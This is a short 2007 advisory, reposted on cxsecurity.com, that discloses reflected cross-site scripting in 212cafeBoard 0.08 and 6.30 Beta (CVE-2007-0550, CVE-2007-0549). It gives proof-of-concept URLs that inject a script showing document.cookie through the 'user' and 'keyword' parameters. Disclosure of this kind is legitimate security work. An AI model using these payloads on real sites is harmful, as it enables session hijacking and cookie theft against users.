Bug: XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta ) ( Ascii Version )

Search:
WLB2

XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )

Published
Credit
Risk
2007.02.02
Linux_Drox
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2007-0550
CVE-2007-0549
No
Yes

Hello

Vulnerable : 212cafeBoard
Version: 0.08 Beta
6.30 Beta
Web : http://www.212cafe.com

i found XSS 212cafeBoard v6.30 Beta :

http://www.example.com/Board/list3.php?user=[XSS]

For Example , you can put :
http://www.example.com/board/list3.php?user='><script>alert(document.coo
kie);</script>

-----------------
and i found XSS in 212cafeBoard v0.08 beta

http://www.example.com/board/search.php?keyword=[XSS]

For Example :
http://www.example.com/board/search.php?keyword='><script>alert(document
.cookie);</script>

-------------------
Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version